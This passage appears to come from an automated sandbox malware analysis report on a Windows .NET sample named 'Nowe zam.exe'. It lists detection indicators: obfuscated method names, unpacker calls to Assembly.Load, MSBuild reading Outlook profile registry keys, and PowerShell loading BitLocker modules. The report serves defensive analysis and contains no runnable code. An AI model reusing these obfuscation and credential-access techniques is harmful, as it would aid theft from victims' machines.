Source: C:\Users\user\Desktop\Nowe zam.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Nowe zam.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Nowe zam.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, rW4ijJCasbbw09ngCX.cs	.Net Code: wO55pbd8NO System.Reflection.Assembly.Load(byte[])
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, rW4ijJCasbbw09ngCX.cs	.Net Code: wO55pbd8NO System.Reflection.Assembly.Load(byte[])
Source: 0.2.Nowe zam.exe.5860000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, rW4ijJCasbbw09ngCX.cs	.Net Code: wO55pbd8NO System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_04B183A0 push eax; mov dword ptr [esp], ecx	0_2_04B183A4
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_04B18391 push eax; mov dword ptr [esp], ecx	0_2_04B183A4
Source: C:\Users\user\Desktop\Nowe zam.exe	Code function: 0_2_04B18A70 push eax; ret	0_2_04B18AA3

Source: Nowe zam.exe

Static PE information: section name: .text entropy: 7.9748723738404985

Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, h2RdXWmKrOcA4lBQp9.cs	High entropy of concatenated method names: 'c7wHJddNWH', 'GEbHLEGy41', 'K13HrIIQaU', 'le8H9QNLSO', 'JebHEl4Xtc', 'Ps1HyvBTCQ', 'wJ0HQHVAud', 'HyLHPAp6gl', 'qfgHa77S9N', 'LFgHTrBeye'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, rW4ijJCasbbw09ngCX.cs	High entropy of concatenated method names: 'pbqBYOd9Iu', 'aPjBCvtV0F', 'hI2BlCQa2D', 'vKnBHYQ4WL', 'WCyB65JiWS', 'zXrBIvKloA', 'yJJBO4nFv8', 'UJrBAGAn0V', 'j43B2FuBWa', 'inwBW4qxTM'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, gf5RTS9fRSkJBoaOVI.cs	High entropy of concatenated method names: 'O68ZrAeV1r', 'hodZ9oRchi', 'YvgZkPshdk', 'bdpZhNUTSS', 'm7YZui5wWL', 'VygZSuhfqK', 'iyAZ4QtGIE', 'monZGBOj3I', 'QdEZ8QjMOD', 'DGcZd5iWS3'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, PShm6tZisUSUk72SkT.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Cy03cimoIc', 'slg3KcIfaj', 'BiH3zAlbni', 'TFgBmake2h', 'u9rBnarXNb', 'SsiB3HIi7m', 'EXqBBYUdsM', 'LgIrsCojaQIcOqADavQ'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, zjHVUkuQsImgZBRnqb.cs	High entropy of concatenated method names: 'umylfe5Idq', 'u2NlFhDxiD', 'VKvlX5njoG', 'hWlljOM8QP', 'pYylb2qTox', 'msBlecMZy4', 'T1KlwxHHkV', 'qlSlgobuFp', 'mdLlcYMOOZ', 'nn3lKUbTvL'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, S7gABjgHov821TLWvu.cs	High entropy of concatenated method names: 'bHnQgSy9mH', 'MvgQKMyJGc', 'RW4PmZmsO0', 'YtXPnwVcqf', 'DfmQdbKRDX', 'NY5QNtiGym', 'YanQUdjel3', 'MPaQfvugv7', 'unDQFkMsWa', 'HbrQXGUhdw'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, LV1AeIfEmwDFsqTsKb.cs	High entropy of concatenated method names: 'vUOpXli7j', 'rFsJ9Y0as', 'PswLEZ3o4', 'sYLsPn7ib', 'Nbk94UK3I', 'fZ61hSw0O', 'hEpn5XX8R05N7ZrcIH', 'AjHlD7OX9Uk3fqn2jk', 'PgbPTgsxA', 'BlsTqpRbr'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, jP28k7dYxlc8sWXOGn.cs	High entropy of concatenated method names: 'IdA6trv7kp', 'ek56sX2x9l', 'aGvHv6hTwd', 'gCaHueRYNA', 'zuOHS4KpRn', 'Tw0HxCfUYU', 'tWyH4scVRi', 'LLdHGddyn5', 'rjIHqsi7FF', 'WjWH8mS2Zc'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, ve1mEgYtFhYstSIOtG.cs	High entropy of concatenated method names: 'Q3uIYpj0h1', 'vDeIlp6A7I', 'L5OI6VFfeP', 'fy4IOZvb8Z', 'WS7IAemN5R', 'QfY6bpeLsD', 'NS26ekLwbr', 'OWY6wfGIp1', 'nsE6gyjVib', 'J7d6csCif9'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, d8gCKMznxhO9qoF44S.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vQBaZxqKX7', 'AroaE5G6dk', 'J2Xayf2spx', 'mEDaQFu2B8', 'my0aPE6Kpy', 'RObaaMksMv', 'CscaTldfcc'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, oWOXDZtVjZjPbnWG28.cs	High entropy of concatenated method names: 'zBxPkmZlxb', 'GTYPh4OQli', 'daJPvyJN3j', 'TIQPuudPyU', 'il4Pf74oY2', 'oIEPSD6ZXE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, pX2IbuFtpCIMOGeXEB.cs	High entropy of concatenated method names: 'tn0PClOqph', 'C5PPlxvOlN', 'af6PHoGfdK', 'AD6P6gkL6p', 'eJgPI10A5P', 'Pr8PONHjYZ', 'yWWPAF4d5H', 'abeP2dSLFf', 'pGWPWnF9vq', 'm51P0LF1m5'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, aXocyHbAIWldAgwAaR.cs	High entropy of concatenated method names: 'q0OOC9Qiej', 'uiWOHTN7Vg', 'bejOI7cKZJ', 'ynEIKu1UfH', 'PQ1Iz0I9rI', 'zq5OmJrJLf', 'zKCOnht54b', 'kyDO3VPbT5', 'm8GOBREP1u', 'ywTO5maALF'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, lmkKaGxfLkOet2kU7o.cs	High entropy of concatenated method names: 'FKFnOJ6GEN', 'X7lnATk8EF', 'u0lnWHe1uh', 'kIbn0yZt87', 'HNvnEYtsNu', 'HaBnyn4Pks', 'k2L2PS2VraM57t5UPv', 'XkRTBDH9ICZLxrJ52K', 'oIInnSLSvH', 'ihpnBwaaDV'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, TYO6ikvbM2eiVN2xmR.cs	High entropy of concatenated method names: 'Dispose', 'EKanc7m3mm', 'aoV3hAg6X4', 'Ii3RRNihd1', 'z4bnKlE1aT', 'UdInzqpiXm', 'ProcessDialogKey', 'xYS3m6G9id', 'Mo73nf480Y', 'M9y33QUyeQ'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, B9bVDOqMLYYZuBGPwde.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fa5Tfepal0', 'uTdTFXb8oX', 'hNYTXu0WcR', 'TXJTjwWoie', 'BumTbFy44i', 'p1uTeZHuwu', 'osiTwV5jW3'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, VauhTkUpD5HOgi095m.cs	High entropy of concatenated method names: 'EX0E830vMj', 'NatENTc3lv', 'IS8Ef0YKCk', 'FKuEFNXTFW', 'kY7Ehh9I71', 'yjNEvfR8Et', 'OUSEuvsCjJ', 'fTyESq7gDB', 'dMmExR4w5p', 'sNBE4AXU40'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, ltkwIoqy7ggOna0Y7kF.cs	High entropy of concatenated method names: 'zCVa7cNILG', 'emhaDIxYxE', 'Vw8apRA4Tf', 'e6QaJFv3Tt', 'nLjatPxarg', 'jIraL5tmxh', 'QugasEj5KT', 'fvZarOZGit', 'rwda9AL2LA', 'ylOa1yEw6P'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, GKlt7LSDLcMl9C9ZIn.cs	High entropy of concatenated method names: 'WwJQW58i72', 'iNPQ0LoPNv', 'ToString', 'K7uQCCLfDT', 'heHQlVHRs1', 'vsPQHlag2O', 'FH3Q6rCqPM', 'Gb1QIpsD6j', 'CB4QOMHXS3', 'F7dQAH3kNR'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, W3VlPCLflixB2rp71i.cs	High entropy of concatenated method names: 'YOcanbCDNA', 'm5waBRJufT', 'RrCa55I8ei', 'M6XaCsx5na', 'Ul4al8RVB6', 'ACLa6Qxe1u', 'pTPaIFO6or', 'ASPPwDdXx1', 'joxPgR606P', 'IWRPcw3j9I'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, aORc8Fn3Nvyrgg7Afe.cs	High entropy of concatenated method names: 'E72O7h6cPg', 'WitODyLeBc', 'ec6OpyPWgV', 'UiFOJuTWVf', 'eP1OtlFkjx', 'VKFOLcG00q', 'dLjOs7xVaT', 'EJKOr8cpUM', 'NNdO9GvRov', 'iLAO13cCw4'
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, djFCTLAxtxUimQBj8F.cs	High entropy of concatenated method names: 'ToString', 'Pj9ydSuoZ5', 'd8wyhOY73G', 'i8ayvnUU6l', 'W58yuAt0Ow', 'lIKySqYDgq', 'nBkyxrOg84', 'mX1y4frJVM', 'QMryGsSCIl', 'L1iyqT0GNB'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, h2RdXWmKrOcA4lBQp9.cs	High entropy of concatenated method names: 'c7wHJddNWH', 'GEbHLEGy41', 'K13HrIIQaU', 'le8H9QNLSO', 'JebHEl4Xtc', 'Ps1HyvBTCQ', 'wJ0HQHVAud', 'HyLHPAp6gl', 'qfgHa77S9N', 'LFgHTrBeye'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, rW4ijJCasbbw09ngCX.cs	High entropy of concatenated method names: 'pbqBYOd9Iu', 'aPjBCvtV0F', 'hI2BlCQa2D', 'vKnBHYQ4WL', 'WCyB65JiWS', 'zXrBIvKloA', 'yJJBO4nFv8', 'UJrBAGAn0V', 'j43B2FuBWa', 'inwBW4qxTM'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, gf5RTS9fRSkJBoaOVI.cs	High entropy of concatenated method names: 'O68ZrAeV1r', 'hodZ9oRchi', 'YvgZkPshdk', 'bdpZhNUTSS', 'm7YZui5wWL', 'VygZSuhfqK', 'iyAZ4QtGIE', 'monZGBOj3I', 'QdEZ8QjMOD', 'DGcZd5iWS3'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, PShm6tZisUSUk72SkT.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Cy03cimoIc', 'slg3KcIfaj', 'BiH3zAlbni', 'TFgBmake2h', 'u9rBnarXNb', 'SsiB3HIi7m', 'EXqBBYUdsM', 'LgIrsCojaQIcOqADavQ'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, zjHVUkuQsImgZBRnqb.cs	High entropy of concatenated method names: 'umylfe5Idq', 'u2NlFhDxiD', 'VKvlX5njoG', 'hWlljOM8QP', 'pYylb2qTox', 'msBlecMZy4', 'T1KlwxHHkV', 'qlSlgobuFp', 'mdLlcYMOOZ', 'nn3lKUbTvL'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, S7gABjgHov821TLWvu.cs	High entropy of concatenated method names: 'bHnQgSy9mH', 'MvgQKMyJGc', 'RW4PmZmsO0', 'YtXPnwVcqf', 'DfmQdbKRDX', 'NY5QNtiGym', 'YanQUdjel3', 'MPaQfvugv7', 'unDQFkMsWa', 'HbrQXGUhdw'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, LV1AeIfEmwDFsqTsKb.cs	High entropy of concatenated method names: 'vUOpXli7j', 'rFsJ9Y0as', 'PswLEZ3o4', 'sYLsPn7ib', 'Nbk94UK3I', 'fZ61hSw0O', 'hEpn5XX8R05N7ZrcIH', 'AjHlD7OX9Uk3fqn2jk', 'PgbPTgsxA', 'BlsTqpRbr'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, jP28k7dYxlc8sWXOGn.cs	High entropy of concatenated method names: 'IdA6trv7kp', 'ek56sX2x9l', 'aGvHv6hTwd', 'gCaHueRYNA', 'zuOHS4KpRn', 'Tw0HxCfUYU', 'tWyH4scVRi', 'LLdHGddyn5', 'rjIHqsi7FF', 'WjWH8mS2Zc'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, ve1mEgYtFhYstSIOtG.cs	High entropy of concatenated method names: 'Q3uIYpj0h1', 'vDeIlp6A7I', 'L5OI6VFfeP', 'fy4IOZvb8Z', 'WS7IAemN5R', 'QfY6bpeLsD', 'NS26ekLwbr', 'OWY6wfGIp1', 'nsE6gyjVib', 'J7d6csCif9'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, d8gCKMznxhO9qoF44S.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vQBaZxqKX7', 'AroaE5G6dk', 'J2Xayf2spx', 'mEDaQFu2B8', 'my0aPE6Kpy', 'RObaaMksMv', 'CscaTldfcc'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, oWOXDZtVjZjPbnWG28.cs	High entropy of concatenated method names: 'zBxPkmZlxb', 'GTYPh4OQli', 'daJPvyJN3j', 'TIQPuudPyU', 'il4Pf74oY2', 'oIEPSD6ZXE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, pX2IbuFtpCIMOGeXEB.cs	High entropy of concatenated method names: 'tn0PClOqph', 'C5PPlxvOlN', 'af6PHoGfdK', 'AD6P6gkL6p', 'eJgPI10A5P', 'Pr8PONHjYZ', 'yWWPAF4d5H', 'abeP2dSLFf', 'pGWPWnF9vq', 'm51P0LF1m5'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, aXocyHbAIWldAgwAaR.cs	High entropy of concatenated method names: 'q0OOC9Qiej', 'uiWOHTN7Vg', 'bejOI7cKZJ', 'ynEIKu1UfH', 'PQ1Iz0I9rI', 'zq5OmJrJLf', 'zKCOnht54b', 'kyDO3VPbT5', 'm8GOBREP1u', 'ywTO5maALF'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, lmkKaGxfLkOet2kU7o.cs	High entropy of concatenated method names: 'FKFnOJ6GEN', 'X7lnATk8EF', 'u0lnWHe1uh', 'kIbn0yZt87', 'HNvnEYtsNu', 'HaBnyn4Pks', 'k2L2PS2VraM57t5UPv', 'XkRTBDH9ICZLxrJ52K', 'oIInnSLSvH', 'ihpnBwaaDV'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, TYO6ikvbM2eiVN2xmR.cs	High entropy of concatenated method names: 'Dispose', 'EKanc7m3mm', 'aoV3hAg6X4', 'Ii3RRNihd1', 'z4bnKlE1aT', 'UdInzqpiXm', 'ProcessDialogKey', 'xYS3m6G9id', 'Mo73nf480Y', 'M9y33QUyeQ'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, B9bVDOqMLYYZuBGPwde.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fa5Tfepal0', 'uTdTFXb8oX', 'hNYTXu0WcR', 'TXJTjwWoie', 'BumTbFy44i', 'p1uTeZHuwu', 'osiTwV5jW3'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, VauhTkUpD5HOgi095m.cs	High entropy of concatenated method names: 'EX0E830vMj', 'NatENTc3lv', 'IS8Ef0YKCk', 'FKuEFNXTFW', 'kY7Ehh9I71', 'yjNEvfR8Et', 'OUSEuvsCjJ', 'fTyESq7gDB', 'dMmExR4w5p', 'sNBE4AXU40'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, ltkwIoqy7ggOna0Y7kF.cs	High entropy of concatenated method names: 'zCVa7cNILG', 'emhaDIxYxE', 'Vw8apRA4Tf', 'e6QaJFv3Tt', 'nLjatPxarg', 'jIraL5tmxh', 'QugasEj5KT', 'fvZarOZGit', 'rwda9AL2LA', 'ylOa1yEw6P'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, GKlt7LSDLcMl9C9ZIn.cs	High entropy of concatenated method names: 'WwJQW58i72', 'iNPQ0LoPNv', 'ToString', 'K7uQCCLfDT', 'heHQlVHRs1', 'vsPQHlag2O', 'FH3Q6rCqPM', 'Gb1QIpsD6j', 'CB4QOMHXS3', 'F7dQAH3kNR'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, W3VlPCLflixB2rp71i.cs	High entropy of concatenated method names: 'YOcanbCDNA', 'm5waBRJufT', 'RrCa55I8ei', 'M6XaCsx5na', 'Ul4al8RVB6', 'ACLa6Qxe1u', 'pTPaIFO6or', 'ASPPwDdXx1', 'joxPgR606P', 'IWRPcw3j9I'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, aORc8Fn3Nvyrgg7Afe.cs	High entropy of concatenated method names: 'E72O7h6cPg', 'WitODyLeBc', 'ec6OpyPWgV', 'UiFOJuTWVf', 'eP1OtlFkjx', 'VKFOLcG00q', 'dLjOs7xVaT', 'EJKOr8cpUM', 'NNdO9GvRov', 'iLAO13cCw4'
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, djFCTLAxtxUimQBj8F.cs	High entropy of concatenated method names: 'ToString', 'Pj9ydSuoZ5', 'd8wyhOY73G', 'i8ayvnUU6l', 'W58yuAt0Ow', 'lIKySqYDgq', 'nBkyxrOg84', 'mX1y4frJVM', 'QMryGsSCIl', 'L1iyqT0GNB'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, h2RdXWmKrOcA4lBQp9.cs	High entropy of concatenated method names: 'c7wHJddNWH', 'GEbHLEGy41', 'K13HrIIQaU', 'le8H9QNLSO', 'JebHEl4Xtc', 'Ps1HyvBTCQ', 'wJ0HQHVAud', 'HyLHPAp6gl', 'qfgHa77S9N', 'LFgHTrBeye'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, rW4ijJCasbbw09ngCX.cs	High entropy of concatenated method names: 'pbqBYOd9Iu', 'aPjBCvtV0F', 'hI2BlCQa2D', 'vKnBHYQ4WL', 'WCyB65JiWS', 'zXrBIvKloA', 'yJJBO4nFv8', 'UJrBAGAn0V', 'j43B2FuBWa', 'inwBW4qxTM'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, gf5RTS9fRSkJBoaOVI.cs	High entropy of concatenated method names: 'O68ZrAeV1r', 'hodZ9oRchi', 'YvgZkPshdk', 'bdpZhNUTSS', 'm7YZui5wWL', 'VygZSuhfqK', 'iyAZ4QtGIE', 'monZGBOj3I', 'QdEZ8QjMOD', 'DGcZd5iWS3'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, PShm6tZisUSUk72SkT.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Cy03cimoIc', 'slg3KcIfaj', 'BiH3zAlbni', 'TFgBmake2h', 'u9rBnarXNb', 'SsiB3HIi7m', 'EXqBBYUdsM', 'LgIrsCojaQIcOqADavQ'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, zjHVUkuQsImgZBRnqb.cs	High entropy of concatenated method names: 'umylfe5Idq', 'u2NlFhDxiD', 'VKvlX5njoG', 'hWlljOM8QP', 'pYylb2qTox', 'msBlecMZy4', 'T1KlwxHHkV', 'qlSlgobuFp', 'mdLlcYMOOZ', 'nn3lKUbTvL'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, S7gABjgHov821TLWvu.cs	High entropy of concatenated method names: 'bHnQgSy9mH', 'MvgQKMyJGc', 'RW4PmZmsO0', 'YtXPnwVcqf', 'DfmQdbKRDX', 'NY5QNtiGym', 'YanQUdjel3', 'MPaQfvugv7', 'unDQFkMsWa', 'HbrQXGUhdw'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, LV1AeIfEmwDFsqTsKb.cs	High entropy of concatenated method names: 'vUOpXli7j', 'rFsJ9Y0as', 'PswLEZ3o4', 'sYLsPn7ib', 'Nbk94UK3I', 'fZ61hSw0O', 'hEpn5XX8R05N7ZrcIH', 'AjHlD7OX9Uk3fqn2jk', 'PgbPTgsxA', 'BlsTqpRbr'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, jP28k7dYxlc8sWXOGn.cs	High entropy of concatenated method names: 'IdA6trv7kp', 'ek56sX2x9l', 'aGvHv6hTwd', 'gCaHueRYNA', 'zuOHS4KpRn', 'Tw0HxCfUYU', 'tWyH4scVRi', 'LLdHGddyn5', 'rjIHqsi7FF', 'WjWH8mS2Zc'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, ve1mEgYtFhYstSIOtG.cs	High entropy of concatenated method names: 'Q3uIYpj0h1', 'vDeIlp6A7I', 'L5OI6VFfeP', 'fy4IOZvb8Z', 'WS7IAemN5R', 'QfY6bpeLsD', 'NS26ekLwbr', 'OWY6wfGIp1', 'nsE6gyjVib', 'J7d6csCif9'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, d8gCKMznxhO9qoF44S.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vQBaZxqKX7', 'AroaE5G6dk', 'J2Xayf2spx', 'mEDaQFu2B8', 'my0aPE6Kpy', 'RObaaMksMv', 'CscaTldfcc'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, oWOXDZtVjZjPbnWG28.cs	High entropy of concatenated method names: 'zBxPkmZlxb', 'GTYPh4OQli', 'daJPvyJN3j', 'TIQPuudPyU', 'il4Pf74oY2', 'oIEPSD6ZXE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, pX2IbuFtpCIMOGeXEB.cs	High entropy of concatenated method names: 'tn0PClOqph', 'C5PPlxvOlN', 'af6PHoGfdK', 'AD6P6gkL6p', 'eJgPI10A5P', 'Pr8PONHjYZ', 'yWWPAF4d5H', 'abeP2dSLFf', 'pGWPWnF9vq', 'm51P0LF1m5'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, aXocyHbAIWldAgwAaR.cs	High entropy of concatenated method names: 'q0OOC9Qiej', 'uiWOHTN7Vg', 'bejOI7cKZJ', 'ynEIKu1UfH', 'PQ1Iz0I9rI', 'zq5OmJrJLf', 'zKCOnht54b', 'kyDO3VPbT5', 'm8GOBREP1u', 'ywTO5maALF'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, lmkKaGxfLkOet2kU7o.cs	High entropy of concatenated method names: 'FKFnOJ6GEN', 'X7lnATk8EF', 'u0lnWHe1uh', 'kIbn0yZt87', 'HNvnEYtsNu', 'HaBnyn4Pks', 'k2L2PS2VraM57t5UPv', 'XkRTBDH9ICZLxrJ52K', 'oIInnSLSvH', 'ihpnBwaaDV'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, TYO6ikvbM2eiVN2xmR.cs	High entropy of concatenated method names: 'Dispose', 'EKanc7m3mm', 'aoV3hAg6X4', 'Ii3RRNihd1', 'z4bnKlE1aT', 'UdInzqpiXm', 'ProcessDialogKey', 'xYS3m6G9id', 'Mo73nf480Y', 'M9y33QUyeQ'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, B9bVDOqMLYYZuBGPwde.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fa5Tfepal0', 'uTdTFXb8oX', 'hNYTXu0WcR', 'TXJTjwWoie', 'BumTbFy44i', 'p1uTeZHuwu', 'osiTwV5jW3'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, VauhTkUpD5HOgi095m.cs	High entropy of concatenated method names: 'EX0E830vMj', 'NatENTc3lv', 'IS8Ef0YKCk', 'FKuEFNXTFW', 'kY7Ehh9I71', 'yjNEvfR8Et', 'OUSEuvsCjJ', 'fTyESq7gDB', 'dMmExR4w5p', 'sNBE4AXU40'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, ltkwIoqy7ggOna0Y7kF.cs	High entropy of concatenated method names: 'zCVa7cNILG', 'emhaDIxYxE', 'Vw8apRA4Tf', 'e6QaJFv3Tt', 'nLjatPxarg', 'jIraL5tmxh', 'QugasEj5KT', 'fvZarOZGit', 'rwda9AL2LA', 'ylOa1yEw6P'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, GKlt7LSDLcMl9C9ZIn.cs	High entropy of concatenated method names: 'WwJQW58i72', 'iNPQ0LoPNv', 'ToString', 'K7uQCCLfDT', 'heHQlVHRs1', 'vsPQHlag2O', 'FH3Q6rCqPM', 'Gb1QIpsD6j', 'CB4QOMHXS3', 'F7dQAH3kNR'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, W3VlPCLflixB2rp71i.cs	High entropy of concatenated method names: 'YOcanbCDNA', 'm5waBRJufT', 'RrCa55I8ei', 'M6XaCsx5na', 'Ul4al8RVB6', 'ACLa6Qxe1u', 'pTPaIFO6or', 'ASPPwDdXx1', 'joxPgR606P', 'IWRPcw3j9I'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, aORc8Fn3Nvyrgg7Afe.cs	High entropy of concatenated method names: 'E72O7h6cPg', 'WitODyLeBc', 'ec6OpyPWgV', 'UiFOJuTWVf', 'eP1OtlFkjx', 'VKFOLcG00q', 'dLjOs7xVaT', 'EJKOr8cpUM', 'NNdO9GvRov', 'iLAO13cCw4'
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, djFCTLAxtxUimQBj8F.cs	High entropy of concatenated method names: 'ToString', 'Pj9ydSuoZ5', 'd8wyhOY73G', 'i8ayvnUU6l', 'W58yuAt0Ow', 'lIKySqYDgq', 'nBkyxrOg84', 'mX1y4frJVM', 'QMryGsSCIl', 'L1iyqT0GNB'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
